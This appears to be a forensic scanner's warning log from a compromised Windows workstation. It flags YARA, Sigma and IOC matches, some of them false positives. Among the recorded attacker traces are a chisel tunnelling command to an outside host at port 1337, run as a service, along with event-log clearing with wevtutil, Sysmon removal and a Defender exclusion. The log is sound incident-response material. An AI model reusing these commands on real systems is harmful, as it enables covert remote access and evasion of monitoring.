E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Mon Jul 29 01:24:54.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
YARA rule SUSP_PS1_FunctionImports_Jul22_1 / Detects PowerShell tools for new process creations
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-07-29
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_FunctionImports_Jul22_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 18
|
Sep 10 12:30:08 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\utils_tests\traversal_archives\traversal.tar\evil.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Fri Jan 22 10:01:29.000 2021
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \evil.py
SUBSCORE_1:
65
REF_1:
Typical reverse shell names / suspicious file name
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 19
|
Sep 10 12:30:08 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\utils_tests\traversal_archives\traversal_absolute.tar\tmp\evil.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Fri Jan 22 10:46:59.000 2021
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \evil.py
SUBSCORE_1:
65
REF_1:
Typical reverse shell names / suspicious file name
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 20
|
Sep 10 12:31:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_utils_Ansible.Become\library\ansible_become_tests.ps1
EXT:
.ps1
TYPE:
Script
SIZE:
47988
FIRSTBYTES:
2321706f7765727368656c6c0a0a23416e736962 / #!powershell #Ansib
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Tue Aug 6 16:22:44.712 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:44.934 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
YARA rule SUSP_PS1_FunctionImports_Jul22_1 / Detects PowerShell tools for new process creations
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-07-29
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_FunctionImports_Jul22_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 21
|
Sep 10 12:34:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Windows\Logs\DISM\dism.log
EXT:
.log
TYPE:
UNKNOWN
SIZE:
560370
FIRSTBYTES:
efbbbf323032342d30362d30332031393a34363a / 2024-06-03 19:46:
CREATED:
Mon Jun 3 19:46:10.786 2024
MODIFIED:
Tue Sep 3 02:33:23.464 2024
ACCESSED:
Tue Sep 3 02:33:23.464 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_PowerShell_Command_Rare_CmdLine_Arguments / Detects suspicious abbreviated forms of command line arguments used when executing powershell commands
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2020-01-02
TAGS_1:
FILE, SCRIPT, SUSP, T1059_001
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 22
|
Sep 10 12:35:24 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
75
FILE:
E:\Windows\Prefetch\CHISEL.EXE-B229BF2C.pf
EXT:
.pf
TYPE:
UNKNOWN
SIZE:
4912
FIRSTBYTES:
4d414d04b2560000858ac6cba78abcbb888bbccb / MAMV˧
CREATED:
Tue Sep 3 09:39:00.911 2024
MODIFIED:
Tue Sep 3 09:39:00.911 2024
ACCESSED:
Tue Sep 3 13:34:02.433 2024
PERMISSIONS:
BUILTIN\Administrators:F
OWNER:
BUILTIN\Administrators
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 23
|
Sep 10 12:39:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
60
FILE:
E:\Windows\System32\SenseSubAuth.dll
EXT:
.dll
TYPE:
EXE
SIZE:
135168
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Mon Jun 3 20:29:49.654 2024
MODIFIED:
Mon Jun 3 20:29:49.654 2024
ACCESSED:
Mon Jul 22 12:26:34.592 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
COMPANY:
Microsoft Corporation
DESC:
Sense Sub-Authentication Package DLL.
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
SenseSubAuth.dll
INTERNAL_NAME:
SenseSubAuth.dll
IMPHASH:
c53844792b0055bcd17ec940196a203b
REASON_1:
YARA rule SUSP_Msv1_0SubAuthenticationFilter_Export / Detects suspicious unsigned file with Msv1_0SubAuthenticationFilter export
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2020-02-28
TAGS_1:
EXE, FILE, SUSP
RULENAME_1: SUSP_Msv1_0SubAuthenticationFilter_Export
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 24
|
Sep 10 12:44:10 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Windows\System32\WindowsPowerShell\v1.0\Modules\Carbon\IIS\Install-IisApplication.ps1
EXT:
.ps1
TYPE:
UNKNOWN
SIZE:
4009
FIRSTBYTES:
2320436f70797269676874203230313220416172 / # Copyright 2012 Aar
CREATED:
Tue Jun 24 23:29:44.000 2014
MODIFIED:
Tue Jun 24 23:29:44.000 2014
ACCESSED:
Tue Jul 23 12:57:34.163 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_PS1_OBFUSC_FormatString_Sep22_2 / Detects a common PowerShell obfuscation technique that reorders format strings - FPs with legitmate scripts are possible
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-09-28
TAGS_1:
OBFUS, SCRIPT, SUSP, T1027, T1059_001
RULENAME_1: SUSP_PS1_OBFUSC_FormatString_Sep22_2
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 25
|
Sep 10 12:44:58 WIN-LRTT94FA08M/10.100.5.12
MODULE:
RegistryHive
MESSAGE:
Suspicious registry hive entries found
ENTRY:
ROOT\Microsoft\Windows Defender\Exclusions\Paths;C:\Windows\SysWOW64\;0
SCORE:
70
PATH:
E:\Windows\System32\config\SOFTWARE
KEY:
ROOT\Microsoft\Windows Defender\Exclusions\Paths
MODIFIED:
Tue Sep 3 09:12:08 2024
REASON_1:
YARA rule SUSP_Microsoft_Defender_Exclusions_Paths_Sep22 / Detects suspicious Microsoft Defender exclusions that should be reviewed
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-09-29
TAGS_1:
REG, SUSP, T1112
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 26
|
Sep 10 12:53:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
RegistryHive
MESSAGE:
Suspicious registry hive entries found
ENTRY:
ROOT\ControlSet001\Services\telemetryservice\Parameters;Application;C:\Windows\SysWOW64\chisel.exe
SCORE:
75
PATH:
E:\Windows\System32\config\SYSTEM
KEY:
ROOT\ControlSet001\Services\telemetryservice\Parameters
MODIFIED:
Tue Sep 3 09:37:17 2024
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
C:\Windows\SysWOW64\chisel.exe
EXISTS_1:
no
|
Warning 27
|
Sep 10 12:53:54 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Windows\System32\config\SYSTEM
EXT:
TYPE:
Registry Hive
SIZE:
14680064
FIRSTBYTES:
7265676623500000225000000000000000000000 / regf#P"P
CREATED:
Sat May 7 05:17:22.616 2022
MODIFIED:
Tue Sep 3 08:59:48.291 2024
ACCESSED:
Tue Sep 3 08:59:48.291 2024
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule HKTL_Mimikatz_Mimilib_DNS / Detects Mimilib DNS Method
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2019-04-29
TAGS_1:
HKTL, S0002, T1003, T1134_005, T1550_002, T1550_003
RULENAME_1: HKTL_Mimikatz_Mimilib_DNS
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 28
|
Sep 10 12:53:54 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Windows\System32\config\SYSTEM.LOG2
EXT:
.LOG2
TYPE:
Registry Hive
SIZE:
2056192
FIRSTBYTES:
72656766ed500000ed5000000000000000000000 / regfPP
CREATED:
Sat May 7 05:17:22.663 2022
MODIFIED:
Sat May 7 05:17:22.663 2022
ACCESSED:
Sat May 7 05:17:22.663 2022
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule HKTL_Mimikatz_Mimilib_DNS / Detects Mimilib DNS Method
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2019-04-29
TAGS_1:
HKTL, S0002, T1003, T1134_005, T1550_002, T1550_003
RULENAME_1: HKTL_Mimikatz_Mimilib_DNS
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 29
|
Sep 10 12:55:58 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Suspicious eventlog entry found
ENTRY:
Data: [C:\Windows\SysWOW64\chisel.exe client sharepoint-content.com:1337 R:socks telemetryservice C:\Windows\SysWOW64] Provider_Name: nssm EventID_Qualifiers: 16384 EventID_Value: 1008 Version: 0 Level: 4 Task: 0 Opcode: 0 Keywords: 36028797018963968 TimeCreated_SystemTime: 1.7253563323225088e+09 EventRecordID: 3978 Execution_ProcessID: 7500 Execution_ThreadID: 0 Channel: Application Computer: pc01243.MercuryLark.corp
SCORE:
75
FILE:
E:\Windows\System32\winevt\Logs\Application.evtx
EVENT_ID:
1008
EVENT_LEVEL:
4
EVENT_CHANNEL:
Application
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:38:52 2024
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
C:\Windows\SysWOW64\chisel.exe
EXISTS_1:
no
FILE_2:
E:\Windows\System32\winevt\Logs\Application.evtx
EXISTS_2:
yes
TYPE_2:
EVTX
SIZE_2:
2166784
FIRSTBYTES_2:
456c6646696c6500000000000000000018000000 / ElfFile
CREATED_2:
Tue Jun 4 02:25:39.557 2024
OWNER_2:
NT AUTHORITY\LOCAL SERVICE
|
Warning 30
|
Sep 10 12:56:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
EVENT_ID:
1
EVENT_LEVEL:
4
EVENT_CHANNEL:
Microsoft-Windows-Sysmon/Operational
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:15:57 2024
ENTRY:
RuleName: - UtcTime: 2024-09-03 09:15:57.276 ProcessGuid: 553FCD21-D3CD-66D6-D001-000000001100 ProcessId: 7672 Image: C:\Windows\SysWOW64\wevtutil.exe FileVersion: 10.0.22621.3085 (WinBuild.160101.0800) Description: Windows Event Log Utility Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: wevtutil.exe CommandLine: wevtutil cl Microsoft-Windows-Sysmon/Operational CurrentDirectory: C:\Windows\SysWOW64\ User: NT AUTHORITY\SYSTEM LogonGuid: 553FCD21-D016-66D6-E703-000000000000 LogonId: 999 TerminalSessionId: 2 IntegrityLevel: System Hashes: SHA1=EE7A5D82EBB06922541C35146508FE2634D5E9C6,MD5=82B7D34D7CF8AA479E68D20A7F995807,SHA256=0A90284CE5FD716B5A03307F69E3D50C7A99C4C2489C077DA27097CB35FA58A7,IMPHASH=9DC44599DBFD289FD6D31560E274272B ParentProcessGuid: 553FCD21-D3CD-66D6-CE01-000000001100 ParentProcessId: 2052 ParentImage: C:\Windows\SysWOW64\cmd.exe ParentCommandLine: cmd.exe /S /c wevtutil cl Microsoft-Windows-Sysmon/Operational ParentUser: NT AUTHORITY\SYSTEM Provider_Name: Microsoft-Windows-Sysmon Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 EventID: 1 Version: 5 Level: 4 Task: 1 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253549572866256e+09 EventRecordID: 6416116 Execution_ProcessID: 3376 Execution_ThreadID: 4616 Channel: Microsoft-Windows-Sysmon/Operational Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Suspicious Eventlog Clear or Configuration Change
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/07/13
DESCRIPTION_1:
Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).
AUTHOR_1:
Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
ID_1:
cc36992a-4671-4f21-a91d-6c2b72a2edf5
FALSEPOSITIVES_1:
Admin activity, Scripts and administrative tools used in the monitored environment, Maintenance activity
REASONS_COUNT:
1
|
Warning 31
|
Sep 10 12:56:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
EVENT_ID:
1
EVENT_LEVEL:
4
EVENT_CHANNEL:
Microsoft-Windows-Sysmon/Operational
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:17:39 2024
ENTRY:
RuleName: - UtcTime: 2024-09-03 09:17:39.550 ProcessGuid: 553FCD21-D433-66D6-D701-000000001100 ProcessId: 8136 Image: C:\Program Files\Sysmon\Sysmon64.exe FileVersion: 15.14 Description: System activity monitor Product: Sysinternals Sysmon Company: Sysinternals - www.sysinternals.com OriginalFileName: - CommandLine: "C:\Program Files\Sysmon\Sysmon64.exe" -u CurrentDirectory: C:\Windows\SysWOW64\ User: NT AUTHORITY\SYSTEM LogonGuid: 553FCD21-D016-66D6-E703-000000000000 LogonId: 999 TerminalSessionId: 2 IntegrityLevel: System Hashes: SHA1=2F707CC7A635CA9824EBE825ADE3BAA77BC5874C,MD5=99C68A0A2EE8E42EBB52E1C84F80B730,SHA256=39B094613132377BC236F4AD940A3E02C544F86347C0179A9425EDC1BD3B85CD,IMPHASH=A039666F8D08DD16E0909469DA998438 ParentProcessGuid: 553FCD21-D433-66D6-D601-000000001100 ParentProcessId: 9620 ParentImage: C:\Windows\SysWOW64\cmd.exe ParentCommandLine: cmd /c "C:\Program Files\Sysmon\Sysmon64.exe" -u ParentUser: NT AUTHORITY\SYSTEM Provider_Name: Microsoft-Windows-Sysmon Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 EventID: 1 Version: 5 Level: 4 Task: 1 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253550596455505e+09 EventRecordID: 6416508 Execution_ProcessID: 3376 Execution_ThreadID: 4616 Channel: Microsoft-Windows-Sysmon/Operational Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Uninstall Sysinternals Sysmon
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/03/09
DESCRIPTION_1:
Detects the removal of Sysmon, which could be a potential attempt at defense evasion
AUTHOR_1:
frack113
ID_1:
6a5f68d1-c4b5-46b9-94ee-5324892ea939
FALSEPOSITIVES_1:
Legitimate administrators might use this command to remove Sysmon for debugging purposes
REASONS_COUNT:
1
|
Warning 32
|
Sep 10 12:56:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
EVENT_ID:
4
EVENT_LEVEL:
4
EVENT_CHANNEL:
Microsoft-Windows-Sysmon/Operational
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:17:39 2024
ENTRY:
UtcTime: 2024-09-03 09:17:39.767 State: Stopped Version: 15.14 SchemaVersion: 4.90 Provider_Name: Microsoft-Windows-Sysmon Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 EventID: 4 Version: 3 Level: 4 Task: 4 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253550597754016e+09 EventRecordID: 6416509 Execution_ProcessID: 3376 Execution_ThreadID: 4620 Channel: Microsoft-Windows-Sysmon/Operational Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Sysmon Configuration Modification
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/08/02
DESCRIPTION_1:
Detects when an attacker tries to hide from Sysmon by disabling or stopping it
AUTHOR_1:
frack113
ID_1:
1f2b5353-573f-4880-8e33-7d04dcf97744
FALSEPOSITIVES_1:
Legitimate administrative action
REASONS_COUNT:
1
|
Warning 33
|
Sep 10 12:56:59 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx
EVENT_ID:
5001
EVENT_LEVEL:
4
EVENT_CHANNEL:
Microsoft-Windows-Windows Defender/Operational
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:12:50 2024
ENTRY:
ProductName: Microsoft Defender Antivirus ProductVersion: 4.18.24070.5 Provider_Name: Microsoft-Windows-Windows Defender Provider_Guid: 11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78 EventID: 5001 Version: 0 Level: 4 Task: 0 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253547705231264e+09 EventRecordID: 3169 Execution_ProcessID: 3516 Execution_ThreadID: 3448 Channel: Microsoft-Windows-Windows Defender/Operational Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Windows Defender Threat Detection Disabled
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/12/06
DESCRIPTION_1:
Detects disabling Windows Defender threat protection
AUTHOR_1:
Ján Trenčanský, frack113
ID_1:
fe34868f-6e0e-4882-81f6-c43aa8f15b62
FALSEPOSITIVES_1:
Administrator actions (should be investigated), Seen being triggered occasionally during Windows 8 Defender Updates
REASONS_COUNT:
1
|
Warning 34
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
1102
EVENT_LEVEL:
4
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 10:11:04 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: SYSTEM SubjectDomainName: NT AUTHORITY SubjectLogonId: 999 ClientProcessId: 2040 ClientProcessStartKey: 4785074604081773 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 1102 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 4620693217682128896 TimeCreated_SystemTime: 1.7253582649479408e+09 EventRecordID: 143904 Execution_ProcessID: 2160 Execution_ThreadID: 8740 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Security Eventlog Cleared
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/02/24
DESCRIPTION_1:
One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
AUTHOR_1:
Florian Roth (Nextron Systems)
ID_1:
d99b79d2-0a6f-4f46-ad8b-260b6e17f982
FALSEPOSITIVES_1:
Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog), System provisioning (system reset before the golden image creation)
REASONS_COUNT:
1
|
Warning 35
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 10:11:04 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 2040 NewProcessName: C:\Windows\SysWOW64\wevtutil.exe TokenElevationType: %%1936 ProcessId: 3952 CommandLine: wevtutil cl Security TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\SysWOW64\cmd.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.725358264880416e+09 EventRecordID: 143907 Execution_ProcessID: 4 Execution_ThreadID: 2784 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Eventlog Clear or Configuration Change
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/07/13
DESCRIPTION_1:
Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).
AUTHOR_1:
Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
ID_1:
cc36992a-4671-4f21-a91d-6c2b72a2edf5
FALSEPOSITIVES_1:
Admin activity, Scripts and administrative tools used in the monitored environment, Maintenance activity
REASONS_COUNT:
1
|
Warning 36
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 11:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 9328 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253613194657888e+09 EventRecordID: 144034 Execution_ProcessID: 4 Execution_ThreadID: 4460 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
